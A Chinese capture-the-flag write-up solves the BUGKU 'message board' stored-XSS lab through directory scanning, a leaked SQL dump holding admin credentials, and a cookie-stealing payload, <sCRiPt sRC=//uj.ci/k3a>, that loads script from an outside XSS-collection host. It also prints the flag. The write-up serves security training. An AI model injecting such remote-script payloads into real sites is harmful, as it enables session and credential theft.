BUGKU-WEB 留言板

默默提升实验室 2024-08-13 15:03:07 阅读 61

题目描述

在这里插入图片描述

题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台打开场景后界面如下:

在这里插入图片描述

解题思路

看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端即然在服务器端,那就是会在后台弹出窗口了所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies

相关工具

目录扫描工具:御剑或者dirsearch工具:python dirsearch.py -u urlurl解码:https://www.iamwawa.cn/urldecode.html

解题步骤

测试一下script代码:

<script>alert(1)</script>

在这里插入图片描述

发现确实可以读取到。

使用目录扫描工具-御剑进行扫描试试

在这里插入图片描述

得到后台管理地址:http://114.67.175.224:10687/admin.php

在这里插入图片描述

账号密码不知道?

需要注意的是:该题目提示了<code>无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台

所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。

在这里插入图片描述

然后创建一个项目:

在这里插入图片描述

<code><sCRiPt sRC=//uj.ci/k3a></sCrIpT>

将项目中提供的代码输入留言板中:

在这里插入图片描述

然后,返回项目中查看效果:

在这里插入图片描述

这个时候就获取到cookies了,这就是我们需要的flag,注意记得转码(%7B 和%7D):

<code>flag%7B826066e999f695cacd75a92ac9a0ac09%7D

在这里插入图片描述

所以就得到了falg:

<code>flag{826066e999f695cacd75a92ac9a0ac09}


之前该题目是有个数据库文件db.sql文件,可以直接在扫描目录的时候就得到,内容如下:

# Host: localhost (Version: 5.5.53)

# Date: 2019-08-04 16:13:22

# Generator: MySQL-Front 5.3 (Build 4.234)

/*!40101 SET NAMES utf8 */;

#

# Structure for table "text"

#

CREATE DATABASE xss DEFAULT CHARACTER SET utf8;

use xss;

DROP TABLE IF EXISTS `text`;

CREATE TABLE `text` (

`Id` int(11) NOT NULL AUTO_INCREMENT,

`text` varchar(255) DEFAULT NULL,

PRIMARY KEY (`Id`)

) ENGINE=MyISAM DEFAULT CHARSET=utf8;

#

# Data for table "text"

#

/*!40000 ALTER TABLE `text` DISABLE KEYS */;

/*!40000 ALTER TABLE `text` ENABLE KEYS */;

#

# Structure for table "user"

#

DROP TABLE IF EXISTS `user`;

CREATE TABLE `user` (

`Id` int(11) NOT NULL AUTO_INCREMENT,

`username` varchar(255) DEFAULT NULL,

`password` varchar(255) DEFAULT NULL,

PRIMARY KEY (`Id`)

) ENGINE=MyISAM DEFAULT CHARSET=utf8;

#

# Data for table "user"

#

/*!40000 ALTER TABLE `user` DISABLE KEYS */;

INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');

/*!40000 ALTER TABLE `user` ENABLE KEYS */;

可以发现,在最后有一行插入语句:

可以看到

INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');

账号admin,密码011be4d65feac1a8

这就是我们需要的账号密码,登入后发现弹出了弹窗:

在这里插入图片描述

但是,我们并没有得到我们想要的falg,那该如何?当然是获取cookies了:

直接F12,查看cookies即可:

在这里插入图片描述

或者直接在留言板中输入获取cookies的代码,在登录后台的时候自动弹出:

<code><script>alert(document.cookie)</script>

就像这样:

在这里插入图片描述

得到Flag

<code>flag{826066e999f695cacd75a92ac9a0ac09}

在这里插入图片描述

新知识点

学会使用目录扫描工具认识熟悉常见的url编码



声明

本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。